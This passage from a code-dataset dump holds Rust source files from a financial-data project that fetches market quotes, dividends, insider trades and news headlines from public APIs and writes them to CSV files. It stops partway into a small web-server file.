"avg_line_length": 30.3764705657959, "blob_id": "71bb8393c43615f3bc40d6207d62593d4da02c23", "content_id": "48b36957d4da22c1912af04b8a8ad0cf2cbd83fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5336, "license_type": "no_license", "max_line_length": 141, "num_lines": 170, "path": "/finox/src/yf.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n\n/*\nhttps://query1.finance.yahoo.com/v7/finance/spark?symbols=%5EGSPC&range=1d\nhttps://query1.finance.yahoo.com/v7/finance/spark?symbols=BTCUSD%3DX&range=1d\nhttps://query1.finance.yahoo.com/v1/finance/screener/instrument/earnings/fields?lang=en-US&region=US&category=keystats%2Cfinancials\nhttps://query1.finance.yahoo.com/v8/finance/chart/AAPL?region=US&range=1d\nhttps://query1.finance.yahoo.com/v8/finance/chart/USDEUR=X?symbol=USDEUR%3DX&range=1d&interval=1m\nhttps://query2.finance.yahoo.com/ws/insights/v2/finance/insights?region=US&symbol=MSFT\n\nhttps://finance.yahoo.com/_finance_doubledown/api/resource/YFinLists;count=3;listIds=%5B%22commodities%22%2C%22currencies%22%2C%22bonds%22%5D\n*/\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct YFRoot {\n pub chart: Chart,\n}\n\nimpl crate::HasRecs for YFRoot {\nfn to_recs(&self) -> Vec<Vec<String>> {\n let mut ret: Vec<Vec<String>> = Vec::new();\n let ts = &self.chart.result[0].timestamp;\n let meta = &self.chart.result[0].meta;\n if let Some(quote) = &self.chart.result[0].indicators.quote[0] {\n for i in 0..ts.len() {\n let mut rec: Vec<String> = vec![meta.symbol.to_string()]; //Vec::new();\n if let Some(ohlcv) = Quote::to_rec(quote, i) {\n //rec.push(self.chart.result[0].meta.symbol.to_string());\n rec.push(ts[i].to_string());\n rec.append(&mut ohlcv.clone());\n ret.push(rec);\n }\n }\n }\n return ret;\n }\n}\n\nimpl YFRoot {\n pub fn meta_record(&self) -> Vec<String> {\n let rec = Meta::to_rec(&self.chart.result[0].meta);\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Chart {\n pub result: Vec<YFResult>,\n pub error: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct YFResult {\n pub meta: Meta,\n pub timestamp: Vec<i64>,\n pub indicators: Indicators,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Meta {\n pub currency: String,\n pub symbol: String,\n pub exchange_name: String,\n pub instrument_type: String,\n pub first_trade_date: i64,\n pub regular_market_time: i64,\n pub gmtoffset: i64,\n pub timezone: String,\n pub exchange_timezone_name: String,\n pub regular_market_price: f64,\n pub chart_previous_close: f64,\n pub price_hint: i64,\n pub current_trading_period: ::serde_json::Value,\n pub data_granularity: String,\n pub range: String,\n pub valid_ranges: Vec<String>,\n}\n\nimpl Meta {\n pub fn to_rec(&self) -> Vec<String> {\n let rec: Vec<String> = vec![\n self.symbol.to_string(),\n self.exchange_name.to_string(),\n self.instrument_type.to_string(),\n self.currency.to_string(),\n self.first_trade_date.to_string(),\n self.regular_market_time.to_string(),\n self.gmtoffset.to_string(),\n self.timezone.to_string(),\n self.exchange_timezone_name.to_string(),\n ];\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Indicators {\n pub quote: Vec<Option<Quote>>,\n pub adjclose: Option<::serde_json::Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Quote {\n // todo option<vec<option<f64>>>\n pub open: Vec<Option<f64>>,\n pub close: Vec<Option<f64>>,\n pub volume: Vec<Option<i64>>,\n pub low: Vec<Option<f64>>,\n pub high: Vec<Option<f64>>,\n}\n//??\nimpl crate::HasRecs for Quote {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut ret: Vec<Vec<String>> = Vec::new();\n for i in 0..self.high.len() {\n if let Some(rec) = Quote::to_rec(self, i) {\n ret.push(rec);\n }\n }\n return ret;\n }\n}\n\n// TODO refac\nimpl Quote {\n pub fn to_rec(&self, i: usize) -> Option<Vec<String>> {\n let mut rec: Vec<String> = Vec::new();\n if let Some(op) = self.open[i] {\n rec.push(op.to_string());\n } else {\n rec.push(\"\".to_string());\n }\n\n if let Some(hi) = self.high[i] {\n rec.push(hi.to_string());\n } else {\n rec.push(\"\".to_string());\n }\n\n if let Some(lo) = self.low[i] {\n rec.push(lo.to_string());\n } else {\n rec.push(\"\".to_string());\n }\n\n if let Some(close) = self.close[i] {\n rec.push(close.to_string());\n } else {\n rec.push(\"\".to_string());\n }\n\n if let Some(vol) = self.volume[i] {\n rec.push(vol.to_string());\n } else {\n rec.push(\"\".to_string());\n }\n return serde::export::Some(rec);\n }\n}\n\n\n" }, { "alpha_fraction": 0.5662506222724915, "alphanum_fraction": 0.574411928653717, "avg_line_length": 39.843135833740234, "blob_id": "f551504b10b946f529fce3888e31966ec1cb4bbf", "content_id": "d7b976f62d9975b74ca8dbeeb6382c1a2b283a0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 4166, "license_type": "no_license", "max_line_length": 166, "num_lines": 102, "path": "/finox/src/bin/news.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse finox::roses;\nuse std::path::Path;\n\n#[tokio::main]\npub async fn main() {\n // utils::nytarchive();\n\n //finox::nytfeed()?;\n //finox::gsnews()?;\n //guardian_news().await?;\n // TODO: do async and collect HashMap<String, Vec<Vec<String>>>\n if let Ok(recs) =\n finox::fetch::<finox::news::guardian::ArticleRoot>(vec![urlfmt(\"search\")]).await\n {\n println!(\"{:#?}\", recs);\n let file_name = format!(\n \"../data/news/guardian_{}.csv\",\n chrono::Utc::now().to_rfc3339()\n );\n let file_path = Path::new(&file_name);\n roses::write_csv(file_path, recs, &finox::headers::GUARDIAN_HEADER).expect(\"csv prob\");\n }\n\n let nyt_url = format!(\n \"https://api.nytimes.com/svc/news/v3/content/all/all.json?api-key={}&limit=200\",\n finox::keys::NYT_KEY.to_string()\n );\n\n if let Ok(recs) = finox::fetch::<finox::news::nyt::NYTFeed>(vec![nyt_url]).await {\n //println!(\"{:#?}\", recs);\n let file_name = format!(\"../data/news/nyt_{}.csv\", chrono::Utc::now().to_rfc3339());\n let file_path = Path::new(&file_name);\n roses::write_csv(file_path, recs, &finox::headers::NYT_FEED_HEADER).expect(\"csv prob\");\n }\n\n // jpx wont work because root is vec, prob a flatten fix\n //let jpx_url = \"https://www.jpx.co.jp/english/news/news_ym_01.json\";\n\n //if let Ok(recs) = finox::fetch::<finox::news::jpxnews::JPX>(vec![jpx_url]).await {\n // println!(\"{:#?}\", recs);\n //}\n let wsj_url = \"https://video-api.wsj.com/api-video/find_all_videos.asp\".to_string();\n if let Ok(recs) = finox::fetch::<finox::news::wsj::WSJRoot>(vec![wsj_url]).await {\n //println!(\"{:#?}\", recs);\n let file_name = format!(\"../data/news/wsj_{}.csv\", chrono::Utc::now().to_rfc3339());\n let file_path = Path::new(&file_name);\n roses::write_csv(file_path, recs, &finox::headers::WSJ_HEADER).expect(\"csv prob\");\n }\n\n let gs_url = \"https://www.goldmansachs.com/insights/insights-articles.json\";\n if let Ok(recs) = finox::fetch::<finox::news::gs::Root>(vec![gs_url.to_string()]).await {\n println!(\"goldman {:#?}\", recs);\n let file_name = format!(\"../data/news/gs_{}.csv\", chrono::Utc::now().to_rfc3339());\n let file_path = Path::new(&file_name);\n\n roses::write_csv(file_path, recs, &finox::headers::GS_HEADER).expect(\"csv problem\");\n }\n\n let moodys_url = \"https://www.moodys.com/_layouts/mdc/am/Request/request.php?profile=homepage\"; // \"https://www.goldmansachs.com/insights/insights-articles.json\";\n if let Ok(recs) = finox::fetch::<finox::news::moodys::Root>(vec![moodys_url.to_string()]).await\n {\n println!(\"goldman {:#?}\", recs);\n let file_name = format!(\n \"../data/news/moodys_{}.csv\",\n chrono::Utc::now().to_rfc3339()\n );\n let file_path = Path::new(&file_name);\n\n roses::write_csv(file_path, recs, &finox::headers::MOODYS_HEADER).expect(\"csv problem\");\n }\n\n // TODO fix, serializing err\n //let sa_url = \"https://seekingalpha.com/get_trending_articles\".to_string();\n\n //if let Ok(recs) = finox::fetch::<finox::news::sa::SARoot>(vec![sa_url]).await {\n // println!(\"{:#?}\", recs);\n // let file_name = format!(\"../data/news/sa_{}.csv\", chrono::Utc::now().to_rfc3339());\n // let file_path = Path::new(&file_name);\n // roses::write_csv(file_path, recs, &finox::headers::SA_HEADER).expect(\"csv prob\");\n //}\n //bloomberg::news();\n}\n\n//pub async fn fetch_write_blocking<T: finox::HasRecs>(urls: Vec<String>) -> Result<(), csv::Error> {\n// if let Ok(recs) = finox::fetch::<T>(urls).await {\n// println!(\"{:#?}\", recs);\n// let file_name = format!(\"../data/news/wsj_{}.csv\", chrono::Utc::now().to_rfc3339());\n// let file_path = Path::new(&file_name);\n// roses::write_csv(file_path, recs, &finox::headers::WSJ_HEADER).expect(\"csv prob\");\n// }\n//}\n\npub fn urlfmt(s: &str) -> String {\n format!(\n \"https://content.guardianapis.com/{}?api-key={}\",\n s,\n finox::keys::GUARDIAN_KEY\n )\n}\n" }, { "alpha_fraction": 0.5539972186088562, "alphanum_fraction": 0.5666199326515198, "avg_line_length": 30, "blob_id": "7795e149372a12d81615f60d37a6685de64492db", "content_id": "f31892f306881c26ec6fa0d3fdb73d412ee0c57c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 713, "license_type": "no_license", "max_line_length": 91, "num_lines": 23, "path": "/finox/src/bin/cme.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate chrono;\nextern crate reqwest;\nextern crate tokio;\n\nuse std::path::Path;\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn std::error::Error>> {\n let mut urls = vec![];\n let root = \"https://www.cmegroup.com/CmeWS/mvc/Quotes/Future/\";\n for i in 1..1000 {\n urls.push(format!(\"{}{}/G\", root, i));\n }\n\n if let Ok(recs) = finox::fetch::<finox::cme::CMERoot>(urls).await {\n println!(\"{:#?}\", recs);\n let file_name = format!(\"../data/cme/cme_{}.csv\", chrono::Utc::now().to_rfc3339());\n let file_path = Path::new(&file_name);\n finox::roses::write_csv(file_path, recs, &finox::headers::CME_QUOTE_HEADER)\n .expect(\"csv prob\");\n }\n Ok(())\n}\n" }, { "alpha_fraction": 0.6121541261672974, "alphanum_fraction": 0.6126482486724854, "avg_line_length": 26.351350784301758, "blob_id": "bfbec5910e87fb4f2f6b048d2b3851982497642e", "content_id": "7de706542c00da8a521f9fbc7351d9aea7b496f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2024, "license_type": "no_license", "max_line_length": 95, "num_lines": 74, "path": "/finox/src/nasdaq/dividends.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DividendsRoot {\n pub data: DividendData,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRecs for DividendsRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self\n .data\n .dividends\n .rows\n .iter()\n .map(|c| c.to_rec())\n .collect();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DividendData {\n pub ex_dividend_date: String,\n pub dividend_payment_date: String,\n #[serde(rename = \"yield\")]\n pub yield_field: String,\n pub annualized_dividend: String,\n pub payout_ratio: String,\n pub dividends: HeadersRows,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct HeadersRows {\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub ex_or_eff_date: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub amount: String,\n pub declaration_date: String,\n pub record_date: String,\n pub payment_date: String,\n}\n\nimpl Row {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.ex_or_eff_date.to_string(),\n self.type_field.to_string(),\n self.amount.to_string(),\n self.declaration_date.to_string(),\n self.record_date.to_string(),\n self.payment_date.to_string(),\n ];\n }\n}\n\npub const NDAQ_DIVIDEND_HEADER: [&'static str; 6] = [\n \"ex_or_eff_date\",\n \"type_field\",\n \"amount\",\n \"declaration_date\",\n \"record_date\",\n \"payment_date\",\n];\n" }, { "alpha_fraction": 0.6139534711837769, "alphanum_fraction": 0.6156976819038391, "avg_line_length": 28.152542114257812, "blob_id": "76836fdb89e321c9aaca0f416d69cb0dc5f208e4", "content_id": "f476cd65915db292d956d310a3b5c4c99332b7dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1720, "license_type": "no_license", "max_line_length": 105, "num_lines": 59, "path": "/finox/src/news/tr.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "// https://sope.prod.reuters.tv/program/rcom/v1/article-recirc?edition=cn&modules=rightrail,ribbon,bottom\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TRRoot {\n pub rightrail: TRRibbon,\n pub ribbon: TRRibbon,\n pub bottom: TRRibbon,\n}\n\nimpl crate::HasRecs for TRRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for list in [&self.rightrail, &self.ribbon, &self.bottom].iter() {\n recs.append(&mut list.to_recs());\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TRRibbon {\n #[serde(rename = \"ab_test\")]\n pub ab_test: Vec<::serde_json::Value>,\n pub errors: Vec<::serde_json::Value>,\n pub stories: Vec<TRStory>,\n pub tags: Vec<String>,\n}\n\nimpl crate::HasRecs for TRRibbon {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.stories.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TRStory {\n pub updated: i64,\n pub headline: String,\n pub image: String,\n pub reason: String,\n pub path: String,\n pub id: String,\n pub channel: ::serde_json::Value,\n}\n\nimpl TRStory {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.updated.to_string(),\n self.headline.to_string(),\n self.reason.to_string(),\n self.path.to_string(),\n ];\n }\n}\n" }, { "alpha_fraction": 0.46252331137657166, "alphanum_fraction": 0.474563330411911, "avg_line_length": 34.63142013549805, "blob_id": "d6538a413187f9a847b4f6698d6cfca6524217c4", "content_id": "df4c07ad5719e4797bffb82f246a593e8af1830d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 11794, "license_type": "no_license", "max_line_length": 161, "num_lines": 331, "path": "/finox/src/lib.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub mod cme;\npub mod headers;\npub mod keys;\npub mod nasdaq;\npub mod news;\npub mod roses;\npub mod sec;\npub mod yf;\n\nuse crate::nasdaq::realtime::RealtimeRoot;\nuse chrono::{DateTime, FixedOffset, Utc};\nuse futures::stream::StreamExt;\n//use percent_encoding::{utf8_percent_encode, NON_ALPHANUMERIC};\nuse std::{collections::HashMap, error::Error, fmt, fs, path::Path, thread, time::Duration};\n\npub trait HasRecs {\n fn to_recs(&self) -> Vec<Vec<String>>;\n}\n\npub trait HasRec {\n fn to_rec(&self) -> Vec<String>;\n}\n\npub const NYT_DELAY: Duration = Duration::from_millis(6000);\n\npub async fn fetch<'a, T: ?Sized>(urls: Vec<String>) -> Result<Vec<Vec<String>>, String>\nwhere\n for<'de> T: HasRecs + serde::Deserialize<'de> + 'a,\n{\n let fetches = futures::stream::iter(urls.into_iter().map(|url| async move {\n if let Ok(res) = reqwest::get(&url).await {\n //REMOVE SLEEP\n thread::sleep(Duration::from_millis(100));\n if let Ok(root) = res.json::<T>().await {\n return Some(root.to_recs());\n } else {\n println!(\"serialize err {}\", url.clone());\n return None;\n }\n }\n println!(\"response err: {}\", url.clone());\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<Vec<Vec<String>>>>>()\n .await;\n let recs = fetches\n .into_iter()\n .flatten()\n .collect::<Vec<Vec<Vec<String>>>>()\n .into_iter()\n .flatten()\n .collect::<Vec<Vec<String>>>();\n //Ok(Box::new(fetches.into_iter().flatten().collect::<Vec<T>>()))\n Ok(recs)\n}\n\n// when endpoints dont grab a vec\npub async fn fetch_one<'a, T: ?Sized>(urls: Vec<String>) -> Vec<Option<T>>\nwhere\n for<'de> T: HasRec + serde::Deserialize<'de> + 'a,\n{\n let fetches = futures::stream::iter(urls.into_iter().map(|url| async move {\n if let Ok(res) = reqwest::get(&url.clone()).await {\n if let Ok(root) = res.json::<T>().await {\n return Some(root);\n }\n println!(\"serialized json wrong {}\", url.clone());\n return None;\n }\n println!(\"no good1\");\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<T>>>()\n .await;\n return fetches;\n}\n\npub async fn fetch_strings(urls: Vec<String>) -> Vec<Option<sec::SecFormHeader>> {\n let fetches = futures::stream::iter(urls.into_iter().map(|url| async move {\n if let Ok(res) = reqwest::get(&url.clone()).await {\n if let Ok(root) = res.text().await {\n if let Some(header) = sec::sec_header(&root) {\n if let Some(recs) = sec::sec_13f(&root) {\n let realfn = url\n .clone()\n .split(\"/\")\n .map(|x| x.to_string())\n .collect::<Vec<String>>();\n\n let file_name = format!(\n \"../data/sec/13f/{}.csv\",\n realfn.last()?.split(\".\").collect::<Vec<_>>().first()?\n );\n\n let mut wtr = csv::Writer::from_path(file_name.clone()).unwrap();\n\n for rec in recs.iter() {\n wtr.serialize(rec).unwrap();\n }\n\n println!(\"{}: {:#?}\", file_name, recs.len());\n wtr.flush().unwrap();\n return Some(header);\n }\n }\n }\n println!(\"serialized text wrong {}\", url.clone());\n return None;\n }\n println!(\"no good1\");\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<sec::SecFormHeader>>>()\n .await;\n return fetches;\n}\n\n//\npub async fn fetch_write<'a, T: ?Sized>(\n hm: HashMap<String, String>,\n relpath: &str,\n header: &[&str],\n) -> Result<Vec<String>, reqwest::Error>\nwhere\n for<'de> T: HasRecs + serde::Deserialize<'de> + 'a,\n{\n let fetches = futures::stream::iter(hm.into_iter().map(|pair| async move {\n if let Ok(res) = reqwest::get(&pair.1.clone()).await {\n //thread::sleep(Duration::from_millis(100));\n if let Ok(root) = res.json::<T>().await {\n let recs = root.to_recs();\n let file_name = format!(\"{}{}.csv\", relpath.clone(), pair.0);\n let fp = Path::new(&file_name);\n if fp.exists() == true {\n let f = fs::OpenOptions::new()\n .append(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(f, recs.clone(), None).expect(\"csv error\");\n } else {\n let f = fs::OpenOptions::new()\n .write(true)\n .create_new(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(f, recs.clone(), Some(header)).expect(\"csv error\");\n }\n println!(\"{}: {}\", pair.0, recs.len());\n return Some(pair.0);\n }\n println!(\"serialized json wrong {:#?}\", pair.clone());\n return None;\n }\n println!(\"res err\");\n return None;\n }))\n .buffer_unordered(16)\n .collect::<Vec<Option<String>>>()\n .await;\n //println(\"{:#?}\", fetches\n Ok(fetches.into_iter().flatten().collect::<Vec<String>>())\n}\n\npub async fn fetch_rt(\n hm: HashMap<Security, DateTime<FixedOffset>>,\n) -> HashMap<Security, DateTime<FixedOffset>> {\n let fetches = futures::stream::iter(hm.into_iter().map(|pair| async move {\n if let Ok(res) = reqwest::get(&pair.0.to_nasdaq_rt_url().unwrap()).await {\n if let Ok(root) = res.json::<RealtimeRoot>().await {\n if let (Some(recs), newt) = root.to_new_recs(pair.1) {\n let file_name = format!(\n \"../data/nasdaq/realtime-trades/{}.csv\",\n pair.0,\n //Utc::now().to_rfc3339()\n );\n let fp = Path::new(&file_name);\n if fp.exists() == true {\n let f = fs::OpenOptions::new()\n .append(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(f, recs, None).expect(\"csv error\");\n } else {\n let f = fs::OpenOptions::new()\n .write(true)\n .create_new(true)\n .open(fp)\n .expect(\"opening file prob\");\n roses::to_csv(\n f,\n recs,\n Some(&crate::nasdaq::realtime::NDAQ_REALTIME_HEADER),\n )\n .expect(\"csv error\");\n }\n return (pair.0, newt);\n } else {\n return pair;\n }\n } else {\n println!(\"serialize err {:#?}\", pair.clone());\n return pair;\n }\n }\n println!(\"response err: {:#?}\", pair.clone());\n return pair;\n }))\n .buffer_unordered(16)\n .collect::<HashMap<Security, DateTime<FixedOffset>>>()\n .await;\n return fetches;\n}\n\n#[derive(Debug, Clone, PartialEq, Eq, Hash, serde_derive::Serialize, serde_derive::Deserialize)]\npub enum Security {\n Commodity(String),\n Stock(String), // ? might need special treatment, far more endpoints for these\n Currency(String),\n Etf(String),\n}\n\nimpl Security {\n pub fn to_nasdaq_url(&self, sfx: &str) -> String {\n // \"insider-trades\", historical \"option-chain\", \"chart\", \"info\", \"dividends\", realtime-trades\n let pre = \"quote\";\n match self {\n Security::Commodity(s) => garbo(pre, s, sfx, \"commodities\", \"\"),\n Security::Stock(s) => garbo(\n pre,\n s,\n sfx,\n \"stocks\",\n \"&todate=2025-11-30&fromdate=2020-05-19&limit=99999\",\n ),\n Security::Etf(s) => garbo(\n pre,\n s,\n sfx,\n \"etf\",\n \"&todate=2025-11-30&fromdate=2020-05-19&limit=99999\",\n ),\n Security::Currency(s) => garbo(pre, s, sfx, \"currencies\", \"\"),\n }\n }\n\n // only have stocks on rt\n pub fn to_nasdaq_rt_url(&self) -> Result<String, Box<dyn Error>> {\n match self {\n Security::Stock(s) => Ok(garbo(\"quote\", s, \"realtime-trades\", \"stocks\", \"&limit=100\")),\n _ => panic!(\"Nasdaq only has realtime stock quotes\".to_string()),\n }\n }\n\n pub fn to_yf(&self) -> String {\n match self {\n Security::Stock(s) | Security::Etf(s) => format!(\"https://query2.finance.yahoo.com/v8/finance/chart/{}?interval=1d&period1=0&period2=1590498425\", s),\n Security::Currency(s) => format!(\"https://query2.finance.yahoo.com/v8/finance/chart/{}=X?interval=1d&period1=0&period2=1590498425\", s),\n Security::Commodity(s) => format!(\"https://query2.finance.yahoo.com/v8/finance/chart/{}=F?interval=1d&period1=0&period2=1590498425\", s),\n //_ => panic!(\"others not supported\")\n }\n }\n}\n\nimpl fmt::Display for Security {\n fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {\n let mystr = match self {\n Security::Commodity(s) => s,\n Security::Stock(s) => s,\n Security::Currency(s) => s,\n Security::Etf(s) => s,\n };\n write!(f, \"{}\", mystr)\n }\n}\npub fn garbo(pre: &str, s: &str, sfx: &str, sfx2: &str, sfx3: &str) -> String {\n format!(\n \"https://api.nasdaq.com/api/{}/{}/{}?assetclass={}{}\",\n pre, s, sfx, sfx2, sfx3\n )\n}\n\n// fix and percent encoding\npub fn gen_secs(asset_class: &str) -> (Vec<Security>, &[&str]) {\n match asset_class {\n \"stocks\" => (\n roses::read_tickers(\"../ref_data/tickers_stocks.txt\")\n .iter()\n .map(|x| Security::Stock(x.to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_STOCKS,\n ),\n \"commodities\" => (\n roses::read_tickers(\"../ref_data/tickers_commodities.txt\")\n .iter()\n .map(|x| Security::Commodity(x.to_string()))\n //utf8_percent_encode(x, NON_ALPHANUMERIC).to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_COMMODITIES,\n ),\n \"currencies\" => (\n // prob broken, need to interlace the symbols\n roses::read_tickers(\"../ref_data/tickers_currencies.txt\")\n .iter()\n .map(|x| Security::Currency(x.to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_CURRENCIES,\n ),\n \"etf\" => (\n roses::read_tickers(\"../ref_data/tickers_stocks.txt\")\n .iter()\n .map(|x| Security::Etf(x.to_string()))\n .collect::<Vec<Security>>(),\n &headers::YF_STOCKS,\n ),\n\n _ => panic!(\"invalid asset class provided\"),\n }\n}\n\npub fn nls_to_dt(s: &str) -> Result<DateTime<FixedOffset>, chrono::ParseError> {\n let t = format!(\"{} {} +05:00\", Utc::now().format(\"%Y-%m-%d\"), s);\n return DateTime::parse_from_str(&t, \"%Y-%m-%d %H:%M:%S %z\");\n}\n\npub fn ndaq_url_to_ticker(url: String) -> String {\n let v: Vec<&str> = url.split(\"/\").collect(); // divs\n return format!(\"{}\", v[5]);\n}\n" }, { "alpha_fraction": 0.6399034857749939, "alphanum_fraction": 0.6412819027900696, "avg_line_length": 27.73267364501953, "blob_id": "a0cc9cc03b77d3cca60eca5baa4098eab151ebc0", "content_id": "c3d2f96f4ad1291c9b64a172ffc31e7312836f69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2902, "license_type": "no_license", "max_line_length": 95, "num_lines": 101, "path": "/finox/src/nasdaq/insiders.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct InsidersRoot {\n pub data: Data,\n pub message: ::serde_json::Value,\n pub status: gen::Status,\n}\n\nimpl crate::HasRecs for InsidersRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n return self.data\n .transaction_table.rows\n .iter()\n .map(|x| x.to_rec())\n .collect();\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Data {\n pub title: ::serde_json::Value,\n pub number_of_trades: NumberOfTrades,\n pub number_of_shares_traded: NumberOfSharesTraded,\n pub transaction_table: TransactionTable,\n pub filer_transaction_table: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NumberOfTrades {\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub insider_trade: String,\n pub months3: String,\n pub months12: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NumberOfSharesTraded {\n pub headers: ::serde_json::Value,\n pub rows: Vec<Row>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TransactionTable {\n pub headers: ::serde_json::Value,\n pub rows: Vec<TransactionRow>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct TransactionRow {\n pub insider: String,\n pub relation: String,\n pub last_date: String,\n pub transaction_type: String,\n pub own_type: String,\n pub shares_traded: String,\n pub last_price: String,\n pub shares_held: String,\n pub url: String,\n}\n\nimpl TransactionRow {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.insider.to_string(),\n self.relation.to_string(),\n self.last_date.to_string(),\n self.transaction_type.to_string(),\n self.own_type.to_string(),\n self.shares_traded.to_string(),\n self.last_price.to_string(),\n self.shares_held.to_string(),\n self.url.to_string(),\n ];\n }\n}\n\npub const NDAQ_INSIDER_HEADER: [&'static str; 9] = [\n \"insider\",\n \"relation\",\n \"last_date\",\n \"transaction_type\",\n \"own_type\",\n \"shares_traded\",\n \"last_price\",\n \"shares_held\",\n \"url\",\n];\n" }, { "alpha_fraction": 0.44270405173301697, "alphanum_fraction": 0.4509480595588684, "avg_line_length": 32.69444274902344, "blob_id": "3577e7e0c0bb5cf6116e69544effe50b177a3ef0", "content_id": "a4d8ae0f8080f503aee2a6f320a983b9127cc1b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1213, "license_type": "no_license", "max_line_length": 90, "num_lines": 36, "path": "/viz/src/web.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate tokio;\nuse async_std::task;\nuse finox::Security;\nuse tide;\n\nfn main() -> tide::Result<()> {\n task::block_on(async {\n let mut app = tide::new();\n //serde_json::Value::from(infos);\n //for info in infos.iter() 